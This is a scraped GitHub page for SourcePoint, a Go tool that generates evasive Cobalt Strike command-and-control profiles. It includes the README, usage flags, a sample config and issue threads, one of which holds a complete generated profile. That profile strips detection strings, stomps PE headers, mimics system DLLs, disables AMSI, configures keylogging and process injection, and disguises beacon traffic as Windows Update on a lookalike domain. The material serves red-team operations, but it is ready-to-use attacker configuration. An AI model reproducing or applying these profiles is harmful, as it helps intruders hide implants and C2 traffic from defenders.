SourcePoint is a C2 profile generator for Cobalt Strike command and control servers designed to ensure evasion.

SourcePoint

SourcePoint is a polymorphic C2 profile generator for Cobalt Strike C2s, written in Go. SourcePoint allows unique C2 profiles to be generated on the fly that helps reduce our Indicators of Compromise ("IoCs") and allows the operator to spin up complex profiles with minimal effort. This was done by extensively reviewing Articles as well as Patch Notes to identify key functions and modifiable features. SourcePoint was designed with the intent of addressing the issue of how to make our C2 activity harder to detect, focusing on moving away from malicious IoCs to suspicious ones. The goal here is that it is harder to detect our C2 if our IoCs are not malicious in-nature and require additional research to discover the suspicious nature. SourcePoint contains numerous different configurable options to choose from to modify your profile (in most cases if left blank SourcePoint will randomly choose them for you). The generated profiles modify all aspects of your C2. The goal of this project is to not only aid in circumventing detection-based controls but also help blend C2 traffic and activity into the environment, making said activity hard to detect.

Installation

$go get gopkg.in/yaml.v2

$go build SourcePoint.go

Usage

#./SourcePoint -h

	   _____                            ____        _       __
	  / ___/____  __  _______________  / __ \____  (_)___  / /_
	  \__ \/ __ \/ / / / ___/ ___/ _ \/ /_/ / __ \/ / __ \/ __/
	 ___/ / /_/ / /_/ / /  / /__/  __/ ____/ /_/ / / / / / /_
	/____/\____/\__,_/_/   \___/\___/_/    \____/_/_/ /_/\__/
  							(@Tyl0us)

                                                                                                                        
Usage of ./SourcePoint:
  -Allocation string
        Minimum amount of memory to request for injected content (must be higher than 4096)
  -CDN string
        CDN cookie name (typically used for AzureEdge profiles)
  -CDN-Value string
        CDN cookie value (typically used for AzureEdge profiles)
  -Customuri string
        The base URI for custom HTTP GET/POST profile (default "0")
  -Datajitter string
        Appends a value to HTTP-Get and HTTP-Post server output (default "50")
  -Host string
        Team server domain name
  -Injector string
        Select the preferred method to allocate memory in the remote process:
        [*] VirtualAllocEx (Great for cross architecture i.e x86 -> x64 and x64->x86)
        [*] NtMapViewOfSection (A more stealthly option, however fails over to VirtualAllocEx, generating more events when it does)
  -Jitter string
        Jitter percentage for beacon call home
  -Keylogger string
        Select the preferred method the beacon will use to log keystrokes: 
        [*] GetAsyncKeyState (Uses GetAsyncKeyState API (Separate DLL for x86/x64 process))
        [*] SetWindowsHookEx (Uses SetWindowsHookEx API)
  -Keystore string
        SSL keystore name
  -Metadata string
        Specifies how to transform and embed metadata into the HTTP request:
        [*] base64
        [*] base64url
        [*] netbios
        [*] netbiosu (default "base64url")
  -Outfile string
        Name of output file
  -PE_Clone string
        PE file beacon will mimic (Use the number):
        [1] srv.dll
        [2] ActivationManager.dll
        [3] audioeng.dll
        [4] AzureSettingSyncProvider.dll
        [5] BingMaps.dll
        [6] BootMenuUX.dll
        [7] DIAGCPL.dll
        [8] FIREWALLCONTROLPANEL.dll
        [9] WMNetMgr.dll
        [10] wwanapi.dll
        [11] Windows.Storage.Search.dll
        [12] Windows.System.Diagnostics.dll
        [13] Windows.System.Launcher.dll
        [14] Windows.System.SystemManagement.dll
        [15] Windows.UI.BioFeedback.dll
        [16] Windows.UI.BlockedShutdown.dll
        [17] Windows.UI.Core.TextInput.dll
        [18] FILEMGMT.dll
        [19] polprocl.dll
        [20] GPSVC.dll
        [21] libcrypto.dll
        [22] rdpcomapi.dll
        [23] winsqlite3.dll
        [24] wow64.dll
        [25] wow64win.dll
        [26] WWANSVC.dll
  -Password string
        SSL certificate password
  -PostEX_Name string
        File Post-Ex activities will spawn and inject into (Use the number):
        [1] WerFault.exe
        [2] WWAHost.exe
        [3] wlanext.exe
        [4] auditpol.exe
        [5] bootcfg.exe
        [6] choice.exe
        [7] bootcfg.exe
        [8] dtdump.exe
        [9] expand.exe
        [10] fsutil.exe
        [11] gpupdate.exe
        [12] gpresult.exe
        [13] logman.exe
        [14] mcbuilder.exe
        [15] mtstocom.exe
        [16] pcaui.exe
        [17] powercfg.exe
        [18] svchost.exe
  -Profile string
        HTTP GET/POST profile (Use the number):
        [1] Windowsupdate
        [2] Slack
        [3] Gotomeeting
        [4] Outlook.Live
        [5] Cloudfront
        [6] AzureEdge
        [7] Custom (Used with ProfilePath)
  -ProfilePath string
        Path of custom HTTP GET/POST profile...
  -Sleep string
        Initial beacon sleep time
  -Stage string
        Disable host staging (Default: False) (default "False")
  -Uri string
        The number URIs a profile for beacons to choose from
  -Useragent string
        UserAgent string for the beacon to use (Leave blank to randomly select one):
        [*] Win10Chrome
        [*] Win10Edge
        [*] Win10IE
        [*] Win10
        [*] Win6.3
        [*] Linux
        [*] Mac
  -Yaml string
        Path to the Yaml config file

Important

SourcePoint primarily automates the build process of a profile. It’s very important to know all the features modified in these profiles. Knowing these features can really help increase your success.

Options

While there are a lot of settings and features described in the help function of SourcePoint, there are numerous important features baked into each profile that are important to be familiar with. These features are:

Global Options

This part of your profile modifies how the beacon operators. Some of the features used to modify the behaviour are:

  • Host Stage - Allows the team server to host staged shellcode for HTTP, HTTPS, DNS. If this is enabled, anyone sending a GET request with a specific value such has /9ZXq can pull the shellcode as well
  • Sleep - The length of time that a beacon calls back home
  • Jitter - Appends a percentage to the beacon call home time
  • Useragent - The useragent string used when communicating HTTP and HTTPS traffic. Using the appropriate useragent string can help blend into the environment
  • Data Jitter - Adds a random-length string to all GET and POST requests to ensure incoming requests are not the same length
  • SMB Frame Header - Adds a header value to the SMB beacon messages
  • Pipename - Sets the name of the SMB pipe the beacons is going to use for communication
  • Pipename Stager - Sets the name of the SMB stager for the beacons
  • TCP Frame Header - Adds a header value to the TCP beacon messages
  • SSH Banner - The SSH banner used
  • SSH Pipename - The name used for the SSH banner

Stage

This part of your profile controls how beacon is loaded into memory and edit the content of the beacon DLL. Some of the features used to modify the behaviour are:

  • Obfuscate - Obfuscates the import table of the reflective DLL
  • Stomppe - Asks the payload to stomp MZ, PE and, e_lfanen values after loading
  • Clean up - Tells the beacon to free up memory assoicated with the refelctive DLL that initalized it
  • UseRWX - Ensures shellcode does not use Read, Write Execute permissions
  • Smart Inject - Uses embedded function pointer hints to bootstrap the beacon agent without walking kernel32 EAT
  • Sleep Mask - TCP and SMB beacons will obfuscate themselves at rest while they wait for the connection to be established
  • PE Header - Changes the characteristics of your beacon Reflective DLL to look like something else in memory
  • Transformation - Transform beacon's Reflective DLL stage by removing or adding strings to the .rdata section

Process-Inject

This part of your profile controls how the beacon shapes injected content and controls process injection behavior. Some of the features used to modify the behaviour are:

  • Allocator - Determines how the beacon's Reflective loader allocates memory
  • Minimum Allocation - Minimum amount of memory to request for injected content
  • Userwx - Ensures shellcode does not use Read, Write Execute permissions (The alternative is RW)
  • Startrwx - Use Read, Write Execute as initial permissions for injected content (The alternative is RW)
  • Transformer - Adds a block of padding content injected by the beacon
  • Execute - This section determines how to execute the injected code

Post-Exec

This part of your profile controls how the beacon handles post-exploitation modules and commands. Some of the features used to modify the behaviour are:

  • Spawnto - Determines the default temporary process beacon will spawn for its post-exploitation command and options
  • Obfuscate - Obfuscates the import table of the reflective DLL
  • Smart Inject - Pass key function pointers from beacon to its child jobs
  • AMSI disable - Disable AMSI for powerpick, execute-assembly, and psinject (Certain EDRs can detect this best avoid using these tools)
  • Keylogger - Determines how the keystroker logging API use to capture keystrokes

Profiles

Currently SourcePoint provides you with 6 baked in options for HTTP/HTTPS traffic profiles, based on existing profiles. Of these 6, 4 of them are influenced by and based on:

  • Microsoft Window's Update Communication
  • Slack's Message Communication
  • Gotomeeting's Active Meeting Communication
  • Microsoft Outlook's Email Communication

2 of the profile options (5 and 6) are designed specifically for:

  • Cloudfront.net
  • AzureEdge.net

The last option (7) is designed to input a custom profile. This option is designed to allow an operator to utilize a completely custom traffic profile. There are many cases where a completely unique traffic profile will yield high success rather than one of these. This also allows operators to still utilize SourcePoint's malleability features with their go-to or favorite traffic profile. As this allows for unique profiles it’s important to ensure you tweak and adjust the profile for SourcePoint to work. At a minimum:

  • Replace - header "Host" "acme.com"; with header "Host" "{{.Variables.Host}}";
  • Replace - /pathtolegitpage/ under the GET field with {{.Variables.HTTP_GET_URI}}
  • Replace - /pathtolegitpage/ under the POST field with {{.Variables.HTTP_POST_URI}}

To do so, use the following options -CustomURI and -ProfilePath along with -Profile 7. While developing a profile, it’s highly recommended to use the native ./c2lint to verify everything is working.

Sample Yaml Configs

Stage: "False"
Host: "acme-email.com"
Keystore: "acme-email.com.store"
Password: "Password"
Metadata: "netbios"
Injector: "VirtualAllocEx"
Outfile: "acme.profile"
PE_Clone: 20
Profile: 4
Allocation: 5312
Jitter: 30
Debug: true
Sleep: 35
Uri: 3
Useragent:  "Mac"
Post-EX Processname: 11
Datajitter: 40
Keylogger: "SetWindowsHookEx"
Customuri: 
CDN:
CDN_Value: 
ProfilePath:

SSL Certificate

Profiles mode 1-4 can be used without a validate SSL, SourcePoint will generate a self-signed certificate related to the profile type. However, valid SSL certificates are extremely important the success of any type of C2. For many reasons but obviously no certificate means the traffic is going to be unencrypted (i.e. HTTP WHICH SHOULD NEVER BE USED) but using a self-signed cert comes with its obvious limitations. There are many ways to obtain a valid SSL certificate to make a keystore my go to way is using a modified version of HTTPsC2DoneRight.sh, created by Cham423.

DNS

Currently DNS customization not offered directly through SourcePoint. To still allow dns-based beacons there is a commented out section for dns-beacon in every generated profile.

To Do List

  • Add More Profiles
  • DNS Staging
Owner
Tylous
Tylous
https://github.com/Tylous/SourcePoint
Comments
  • maybe Bug when creating the http.get and http.post URI

    maybe Bug when creating the http.get and http.post URI

    The project (when i used it) creates a valid c2 profile execpt that the http.get and http.post sections for the uri forget a '/' char and add a space at the end(which is not a bug just odd)

    for example:

    Example Currently being generated by profile: uri "sdfghjk "

    Example of what I did to fix it on the test generated profile: uri "/sdfghjk"

    this causes beacon to never check in properly with the coded http c2 method for the profile i generated. This can be observed in the web log

  • [Bug] When specifying self-signed cert, does not write the correct header for

    [Bug] When specifying self-signed cert, does not write the correct header for "https-certificate"

    Everything works great, I love this tool. The only issue is that when you don't specify a keystore for the certificate, the header for the section of "https-certificate" isn't written to the final profile.

    The following command: SourcePoint -Injector VirtualAllocEx -Jitter 21 -Keylogger SetWindowsHookEx -PE_Clone 24 -PostEX_Name 17 -Outfile deez.profile -Host www.bing.com -Profile 2

    Results in the following last 20 lines of the profile

    $ tail -20 deez.profile

header "Cache-Control" "private, no-cache, no-store, must-revalidate";
header "X-Frame-Options" "SAMEORIGIN";
header "Vary" "Accept-Encoding";
header "X-Via" "haproxy-www-suhx";

}


}


set CN       "www.bing.com"; #Common Name
set O        "Slack Technologies Inc"; #Organization Name
set C        "US"; #Country
set L        "San Francisco"; #Locality
set OU       "DigiCert Inc"; #Organizational Unit Name
set ST       "CA"; #State or Province
set validity "365"; #Number of days the cert is valid for
}
        %

    Note, right about set CN there is no https-certificate { as there should be

  • CS 4.6 Support

    CS 4.6 Support

    https://www.cobaltstrike.com/blog/cobalt-strike-4-6-the-line-in-the-sand/ Execute-assembly 1MB Limit Increase A number of users have been asking for this for quite some time, and the change that we made affect not only execute-assembly, but other tasks (eg. dllinject) as well. We have added three new settings to the Malleable C2 profile (tasks_max_size, tasks_proxy_max_size and tasks_dns_proxy_max_size) that can be used to control maximum size limits. Note that these settings need to be set prior to team server startup. If the size is increased at a later time, old artifacts will still use the previous size settings and tasks that are too large will be rejected.

  • Staging Disabled In Profile

    Staging Disabled In Profile

    This is from the latest version of Cobalt Strike, downloaded today. Quite possibly user error but I'd appreciate any insights you could provide.

    Generating Profile:

    ┌──(kali㉿kali)-[~/Desktop/SourcePoint-main] └─$ ./SourcePoint -Injector NtMapViewOfSection -Host 0012eb.lwindowsupdate.com -Jitter 20 -Outfile teststage2.profile -Stage True -PE_Clone 12 -PostEX_Name 11 -Profile 1 -Useragent Win10Chrome

           _____                            ____        _       __ 
      / ___/____  __  _______________  / __ \____  (_)___  / /_
      \__ \/ __ \/ / / / ___/ ___/ _ \/ /_/ / __ \/ / __ \/ __/
     ___/ / /_/ / /_/ / /  / /__/  __/ ____/ /_/ / / / / / /_  
    /____/\____/\__,_/_/   \___/\___/_/    \____/_/_/ /_/\__/  
                                                    (@Tyl0us)

    [*] Preparing Varibles... [*] Building Profile... [!] Host Staging Is Enabled - Staged Payloads Are Available But Your Beacon Payload Is Available To Anyone That Connects To Your Server To Request It [*] Post-Ex Process Name: gpupdate.exe [*] Seleted Profile: WindowsUpdate [+] Profile Generated: teststage2.profile [+] Happy Hacking

    Starting CS says

    ┌──(kali㉿kali)-[~/Desktop/cs-1/cobaltstrike] └─$ sudo ./teamserver 192.168.2.200 password ./teststage2.profile
    [*] Will use existing X509 certificate and keystore (for SSL) [+] I see you're into threat replication. ./teststage2.profile loaded. [*] Loading properties file (/home/kali/Desktop/cs-1/cobaltstrike/TeamServer.prop). [!] Properties file (/home/kali/Desktop/cs-1/cobaltstrike/TeamServer.prop) was not found. [!] Woah! Your profile disables hosted payload stages. Payload staging won't work. [+] Team server is up on 0.0.0.0:50050 [*] SHA256 hash of SSL cert is:

    Output from teststage2.profile

    set host_stage "True"; set sleeptime "44000"; set jitter "20"; set useragent "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.114 Safari/537.36";

    set data_jitter "50"; set smb_frame_header ""; set pipename "plugplay+3850"; set pipename_stager "plugplay+1395";

    set tcp_frame_header ""; set ssh_banner "Welcome to Ubuntu 20.04.1 LTS (GNU/Linux 5.4.0-1029-aws x86_64)"; set ssh_pipename "plugplay+##";

    ####Manaully add these if your doing C2 over DNS (Future Release)#### ##dns-beacon {

    set dns_idle "1.2.3.4";

    set dns_max_txt "199";

    set dns_sleep "1";

    set dns_ttl "5";

    set maxdns "200";

    set dns_stager_prepend "doc-stg-prepend";

    set dns_stager_subhost "doc-stg-sh.";

    set beacon "doc.bc.";

    set get_A "doc.1a.";

    set get_AAAA "doc.4a.";

    set get_TXT "doc.tx.";

    set put_metadata "doc.md.";

    set put_output "doc.po.";

    set ns_response "zero";

    #}

    stage { set obfuscate "true"; set stomppe "true"; set cleanup "true"; set userwx "false"; set smartinject "true";

    #TCP and SMB beacons will obfuscate themselves while they wait for a new connection.
#They will also obfuscate themselves while they wait to read information from their parent Beacon.
set sleep_mask "true";

    set checksum "0"; set compile_time "05 Jun 2028 09:16:06"; set entry_point "229200"; set image_size_x86 "397312"; set image_size_x64 "397312"; set name "Windows.System.Diagnostics.dll"; set rich_header "\x56\xb8\x3f\x82\x12\xd9\x51\xd1\x12\xd9\x51\xd1\x12\xd9\x51\xd1\x1b\xa1\xc2\xd1\x7b\xd9\x51\xd1\x49\xb1\x55\xd0\x19\xd9\x51\xd1\x49\xb1\x52\xd0\x11\xd9\x51\xd1\x49\xb1\x54\xd0\x0c\xd9\x51\xd1\x12\xd9\x50\xd1\x0f\xdc\x51\xd1\x49\xb1\x50\xd0\x1a\xd9\x51\xd1\x49\xb1\x51\xd0\x13\xd9\x51\xd1\x49\xb1\x58\xd0\x3f\xd9\x51\xd1\x49\xb1\xac\xd1\x13\xd9\x51\xd1\x49\xb1\xae\xd1\x13\xd9\x51\xd1\x49\xb1\x53\xd0\x13\xd9\x51\xd1\x52\x69\x63\x68\x12\xd9\x51\xd1\x00\x00\x00\x00\x00\x00\x00\x00";

    transform-x86 {
	prepend "\x90\x90\x90"; # NOP, NOP!
	strrep "ReflectiveLoader" "";
	strrep "This program cannot be run in DOS mode" "";
	strrep "NtQueueApcThread" "";
	strrep "IsWow64Process" "";
	strrep "HTTP/1.1 200 OK" "";
	strrep "Stack memory was corrupted" "";
	strrep "kernel32" "";
	strrep "beacon.dll" "";
	strrep "KERNEL32.dll" "";
	strrep "ADVAPI32.dll" "";
	strrep "WININET.dll" "";
	strrep "WS2_32.dll" "";
	strrep "DNSAPI.dll" "";
	strrep "Secur32.dll" "";
	strrep "VirtualProtectEx" "";
	strrep "VirtualProtect" "";
	strrep "VirtualAllocEx" "";
	strrep "VirtualAlloc" "";
	strrep "VirtualFree" "";
	strrep "VirtualQuery" "";
	strrep "RtlVirtualUnwind" "";
	strrep "sAlloc" "";
	strrep "FlsFree" "";
	strrep "FlsGetValue" "";
	strrep "FlsSetValue" "";
	strrep "InitializeCriticalSectionEx" "";
	strrep "CreateSemaphoreExW" "";
	strrep "SetThreadStackGuarantee" "";
	strrep "CreateThreadpoolTimer" "";
	strrep "SetThreadpoolTimer" "";
	strrep "WaitForThreadpoolTimerCallbacks" "";
	strrep "CloseThreadpoolTimer" "";
	strrep "CreateThreadpoolWait" "";
	strrep "SetThreadpoolWait" "";
	strrep "CloseThreadpoolWait" "";
	strrep "FlushProcessWriteBuffers" "";
	strrep "FreeLibraryWhenCallbackReturns" "";
	strrep "GetCurrentProcessorNumber" "";
	strrep "GetLogicalProcessorInformation" "";
	strrep "CreateSymbolicLinkW" "";
	strrep "SetDefaultDllDirectories" "";
	strrep "EnumSystemLocalesEx" "";
	strrep "CompareStringEx" "";
	strrep "GetDateFormatEx" "";
	strrep "GetLocaleInfoEx" "";
	strrep "GetTimeFormatEx" "";
	strrep "GetUserDefaultLocaleName" "";
	strrep "IsValidLocaleName" "";
	strrep "LCMapStringEx" "";
	strrep "GetCurrentPackageId" "";
	strrep "UNICODE" "";
	strrep "UTF-8" "";
	strrep "UTF-16LE" "";
	strrep "MessageBoxW" "";
	strrep "GetActiveWindow" "";
	strrep "GetLastActivePopup" "";
	strrep "GetUserObjectInformationW" "";
	strrep "GetProcessWindowStation" "";
	strrep "Sunday" "";
	strrep "Monday" "";
	strrep "Tuesday" "";
	strrep "Wednesday" "";
	strrep "Thursday" "";
	strrep "Friday" "";
	strrep "Saturday" "";
	strrep "January" "";
	strrep "February" "";
	strrep "March" "";
	strrep "April" "";
	strrep "June" "";
	strrep "July" "";
	strrep "August" "";
	strrep "September" "";
	strrep "October" "";
	strrep "November" "";
	strrep "December" "";
	strrep "MM/dd/yy" "";
	strrep "Stack memory around _alloca was corrupted" "";
	strrep "Unknown Runtime Check Error" "";
	strrep "Unknown Filename" "";
	strrep "Unknown Module Name" "";
	strrep "Run-Time Check Failure #%d - %s" "";
	strrep "Stack corrupted near unknown variable" "";
	strrep "Stack pointer corruption" "";
	strrep "Cast to smaller type causing loss of data" "";
	strrep "Stack memory corruption" "";
	strrep "Local variable used before initialization" "";
	strrep "Stack around _alloca corrupted" "";
	strrep "RegOpenKeyExW" "";
	strrep "egQueryValueExW" "";
	strrep "RegCloseKey" "";
	strrep "LibTomMath" "";
	strrep "Wow64DisableWow64FsRedirection" "";
	strrep "Wow64RevertWow64FsRedirection" "";
	strrep "Kerberos" "";

	}

transform-x64 {
	prepend "\x90\x90\x90"; # NOP, NOP!
	strrep "ReflectiveLoader" "";
	strrep "This program cannot be run in DOS mode" "";
	strrep "beacon.x64.dll" "";
	strrep "NtQueueApcThread" "";
	strrep "IsWow64Process" "";
	strrep "HTTP/1.1 200 OK" "";
	strrep "Stack memory was corrupted" "";
	strrep "kernel32" "";
	strrep "beacon.dll" "";
	strrep "KERNEL32.dll" "";
	strrep "ADVAPI32.dll" "";
	strrep "WININET.dll" "";
	strrep "WS2_32.dll" "";
	strrep "DNSAPI.dll" "";
	strrep "Secur32.dll" "";
	strrep "VirtualProtectEx" "";
	strrep "VirtualProtect" "";
	strrep "VirtualAllocEx" "";
	strrep "VirtualAlloc" "";
	strrep "VirtualFree" "";
	strrep "VirtualQuery" "";
	strrep "RtlVirtualUnwind" "";
	strrep "sAlloc" "";
	strrep "FlsFree" "";
	strrep "FlsGetValue" "";
	strrep "FlsSetValue" "";
	strrep "InitializeCriticalSectionEx" "";
	strrep "CreateSemaphoreExW" "";
	strrep "SetThreadStackGuarantee" "";
	strrep "CreateThreadpoolTimer" "";
	strrep "SetThreadpoolTimer" "";
	strrep "WaitForThreadpoolTimerCallbacks" "";
	strrep "CloseThreadpoolTimer" "";
	strrep "CreateThreadpoolWait" "";
	strrep "SetThreadpoolWait" "";
	strrep "CloseThreadpoolWait" "";
	strrep "FlushProcessWriteBuffers" "";
	strrep "FreeLibraryWhenCallbackReturns" "";
	strrep "GetCurrentProcessorNumber" "";
	strrep "GetLogicalProcessorInformation" "";
	strrep "CreateSymbolicLinkW" "";
	strrep "SetDefaultDllDirectories" "";
	strrep "EnumSystemLocalesEx" "";
	strrep "CompareStringEx" "";
	strrep "GetDateFormatEx" "";
	strrep "GetLocaleInfoEx" "";
	strrep "GetTimeFormatEx" "";
	strrep "GetUserDefaultLocaleName" "";
	strrep "IsValidLocaleName" "";
	strrep "LCMapStringEx" "";
	strrep "GetCurrentPackageId" "";
	strrep "UNICODE" "";
	strrep "UTF-8" "";
	strrep "UTF-16LE" "";
	strrep "MessageBoxW" "";
	strrep "GetActiveWindow" "";
	strrep "GetLastActivePopup" "";
	strrep "GetUserObjectInformationW" "";
	strrep "GetProcessWindowStation" "";
	strrep "Sunday" "";
	strrep "Monday" "";
	strrep "Tuesday" "";
	strrep "Wednesday" "";
	strrep "Thursday" "";
	strrep "Friday" "";
	strrep "Saturday" "";
	strrep "January" "";
	strrep "February" "";
	strrep "March" "";
	strrep "April" "";
	strrep "June" "";
	strrep "July" "";
	strrep "August" "";
	strrep "September" "";
	strrep "October" "";
	strrep "November" "";
	strrep "December" "";
	strrep "MM/dd/yy" "";
	strrep "Stack memory around _alloca was corrupted" "";
	strrep "Unknown Runtime Check Error" "";
	strrep "Unknown Filename" "";
	strrep "Unknown Module Name" "";
	strrep "Run-Time Check Failure #%d - %s" "";
	strrep "Stack corrupted near unknown variable" "";
	strrep "Stack pointer corruption" "";
	strrep "Cast to smaller type causing loss of data" "";
	strrep "Stack memory corruption" "";
	strrep "Local variable used before initialization" "";
	strrep "Stack around _alloca corrupted" "";
	strrep "RegOpenKeyExW" "";
	strrep "egQueryValueExW" "";
	strrep "RegCloseKey" "";
	strrep "LibTomMath" "";
	strrep "Wow64DisableWow64FsRedirection" "";
	strrep "Wow64RevertWow64FsRedirection" "";
	strrep "Kerberos" "";
	}

    }

    process-inject { # set remote memory allocation technique set allocator "NtMapViewOfSection";

    # shape the content and properties of what we will inject
set min_alloc "9457";
set userwx    "false";
set startrwx "true";

transform-x86 {
    prepend "\x90\x90\x90\x90\x90\x90\x90\x90\x90"; # NOP, NOP!
}

transform-x64 {
    prepend "\x90\x90\x90\x90\x90\x90\x90\x90\x90"; # NOP, NOP!
}

# specify how we execute code in the remote process
execute {
	CreateThread "ntdll.dll!RtlUserThreadStart+0x2302";
    NtQueueApcThread-s;
    SetThreadContext;
    CreateRemoteThread;
	CreateRemoteThread "kernel32.dll!LoadLibraryA+0x1000";
    RtlCreateUserThread;
}

    }

    post-ex { # control the temporary process we spawn to

    set spawnto_x86 "%windir%\syswow64\gpupdate.exe"; set spawnto_x64 "%windir%\sysnative\gpupdate.exe";

    # change the permissions and content of our post-ex DLLs
set obfuscate "true";

# pass key function pointers from Beacon to its child jobs
set smartinject "true";

# disable AMSI in powerpick, execute-assembly, and psinject
set amsi_disable "true";

# control the method used to log keystrokes 
set keylogger "SetWindowsHookEx";

    }

    http-get { set uri "/c/msdownload/update/others/2019/12/7jJw9JrTrLDNfSeO3i ";

    client {

    header "Accept" "*/*";
header "Host" "0012eb.lwindowsupdate.com";

metadata {
	base64url;
	append ".cab";
	uri-append;
}

    }

    server { header "Content-Type" "application/vnd.ms-cab-compressed"; header "Server" "Microsoft-IIS/8.5"; header "MSRegion" "N. America"; header "Connection" "keep-alive"; header "X-Powered-By" "ASP.NET";

    output {

	print;
}

    } }

    http-post { set uri "/c/msdownload/update/others/2019/12/b4v2CKdyaMF33ftBarW-faotz ";

    set verb "GET";

    client {

    header "Accept" "*/*";


id {
	prepend "download.windowsupdate.com/c/";
	header "Host";
}


output {
	base64url;
	append ".cab";
	uri-append;
}

    }

    server { header "Content-Type" "application/vnd.ms-cab-compressed"; header "Server" "Microsoft-IIS/8.5"; header "MSRegion" "N. America"; header "Connection" "keep-alive"; header "X-Powered-By" "ASP.NET";

    output {
	print;
}

    } }

    http-stager { server { header "Content-Type" "application/vnd.ms-cab-compressed"; } }

    https-certificate { set CN "0012eb.lwindowsupdate.com"; #Common Name set O "Microsoft Corporation"; #Organization Name set C "US"; #Country set L "Redmond"; #Locality set OU "Microsoft IT"; #Organizational Unit Name set ST "WA"; #State or Province set validity "365"; #Number of days the cert is valid for }

  • Add HTTP Config Option (Feature Request)

    Add HTTP Config Option (Feature Request)

    Awesome project! Do you think you could add an additional option to set trust_x_forwarded_for in the http-config block for when using HTTP redirectors?

    http-config{
    set trust_x_forwarded_for "true";
}
  • c2lint error to check

    c2lint error to check

    Does anyone encounter this problem? My CS version is 4.5

    [-] Error(s) while compiling /root/Downloads/edu.profile Error: invalid option for at line 8 tasks_max_size Error: invalid option for at line 9 tasks_proxy_max_size Error: invalid option for at line 10 tasks_dns_proxy_max_size [-] Unable to load the Beacon profile /root/Downloads/edu.profile

  • Cannot run with -PE_Clone 30

    Cannot run with -PE_Clone 30

    🐛 Summary

    There are 30 options for the PE_Clone, the last one being umppc.dll. When trying to specify #30, an error is thrown. This error comes from Loader.go

    To reproduce

    1. Run SourcePoint with the parameter -PE_Clone 30

    Any helpful log output or screenshots

    [*] Preparing Varibles...
2022/07/08 15:49:17 Error: Please provide a valid PE number less the 31 option

    Add any screenshots of the problem here. image

  • Indexing error when setting PE_Name variable

    Indexing error when setting PE_Name variable

    🐛 Summary

    Line 93 of Loader/Loader.go uses PE[5] to reference the 5th element from the Beacon_Stage_p2 that is generated. 2/30 of the options in Struct/Struct.go do not have the image_size variables, so this line will reference the incorrect variable 1/15 times, or when specifying CyMemDef64.dll (27) or umppc.dll (30) as PE_Clone. The actual error is thrown on line 94 of Loader/Loader.go when printing the name after splitting by ".

    To reproduce

    1. This error can be reproduced by running the code with -PE_Clone 27 or -PE_Clone 30

    Any helpful log output or screenshots

    [!] Host Staging Is Enabled - Staged Payloads Are Available But Your Beacon Payload Is Available To Anyone That Connects To Your Server To Request It
panic: runtime error: index out of range [1] with length 1

goroutine 1 [running]:
github.com/Tylous/SourcePoint/Loader.GenerateOptions({_, _}, {_, _}, {_, _}, {_, _}, {0x0, 0x0}, ...)
        /tools/SourcePoint/Loader/Loader.go:94 +0x993
main.main()
        /tools/SourcePoint/SourcePoint.go:252 +0xd11

    Below is a screenshot of the error that is thrown:

    image

  • Multiple custom profile fixes and features

    Multiple custom profile fixes and features

    Sorry for the pull req with multiple changes - they're all focussed on the custom profile functionality

    1. Customuri broken

    Custom profile option did not utilise the parameter specified in the -Customuri argument. This was due to profile option 8 using:

    baseuri = "//"

    The correct base uri setting was in the unused profile 9. This has been copied over into profile 8 in commit a41fad8 , and now is:

    baseuri = "" + customuri + ""

    2. Added CustomuriGET and CustomuriPOST

    Enabling specification of different customuri parameters for each of GET and POST, matching the functionality of the built in profiles. Commit #0ca7789

    3. Removed requirement for valid SSL certificates when using custom profile

    Saves the additional setup when team server is only contactable via a secure backplane from redirectors.

    4. Readme housekeeping

    Added guidance for CustomuriGET and CustomuriPOST. Minor corrections around profile numbers for custom profile, as some references to 7 as custom profile still remained.

  • Fix incorrect array reference

    Fix incorrect array reference

    Array for GeneratePE function without beacon_PE arg specified incorrectly referenced the Post_EX_Process_Name array,

    • PE_Num would be assigned 0-26, and was crashing out if 17+, as the Post_EX_Process_Name array only has 17 values. Think this is the incorrect array altogether.

    Corrected to Peclone_list - In line with the PEclone_list array queried when beacon_PE arg is specified.

  • fixing indexing error

    fixing indexing error

    • Fix for indexing error mentioned in https://github.com/Tylous/SourcePoint/issues/14
    • Changed code to index length of the var - 3 to always reference the name.
  • Added DNS Support & Spawnto fix

    Added DNS Support & Spawnto fix

    • Added DNS support. Idle DNS points to a Microsoft owned ip.
    • Fixed one of the spawnto targets (dtdump.exe) which did not have a x64 binary. Now targets w32tm
  • http-get.client.metadata error

    http-get.client.metadata error

    Hello, i am getting an http-get.client.metadata error.

    Invalid session id [-] A Malleable C2 attempt to recover data from a '.http-get.client.metadata' transaction failed. This could be due to a bug in the profile, a change made to the profile after this Beacon was run, or a change made to the transaction by some device between your target and your Cobalt Strike controller. The following information will (hopefully) help narrow down what happened.

    Error

    From '15.158.36.55' URI '/safebrowsing/8ijb3/793g0INlUAzvUkU'**

    Headers

    'REMOTE_ADDRESS' = '/xx.xx.xx.xx' 'Accept' = 'text/html,application/xhtml+xml,application/xml;q=0.9,*/*l;q=0.8' 'CloudFront-Viewer-Country' = 'XX' 'CloudFront-Is-Tablet-Viewer' = 'false' 'CloudFront-Forwarded-Proto' = 'https' 'User-Agent' = 'Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10.10; rv:75.0) Gecko/20100101 Firefox/75.0' 'Connection' = 'Keep-Alive' 'Referer' = 'http://www.google.test' 'CloudFront-Is-Mobile-Viewer' = 'false' 'CloudFront-Is-SmartTV-Viewer' = 'false' 'Host' = 'd2mhkyo3wllxj8.cloudfront.net' 'Pragma' = 'no-cache' 'Via' = '1.1 xx.cloudfront.net (CloudFront)' 'Cache-Control' = 'no-cache' 'X-Amz-Cf-Id' = 'rQYhM_G34ARassaddsasdsadssadasadsddasdsadssadgK6lISasHqmV9xVCxxasxQ==' 'X-Forwarded-For' = 'x.x.x.x' 'CloudFront-Viewer-ASN' = '4657' 'CloudFront-Is-Desktop-Viewer' = 'true'

    This is my command to generate the sourcepoint profile ./SourcePoint -Outfile test2.profile -Host xxx.cloudfront.net -Injector NtMapViewOfSection -Profile 5 -Password abcd! -Keystore a123.abc.cf.store

    Anyone has experience in troubleshooting this as i have been trying to troubleshoot this but to no avail ):

    Thanks in advance!

Related tags
Security SourcePoint
goArgonPass is a Argon2 Password utility package for Go using the crypto library package Argon2 designed to be compatible with Passlib for Python and Argon2 PHP. Argon2 was the winner of the most recent Password Hashing Competition. This is designed for use anywhere password hashing and verification might be needed and is intended to replace implementations using bcrypt or Scrypt.

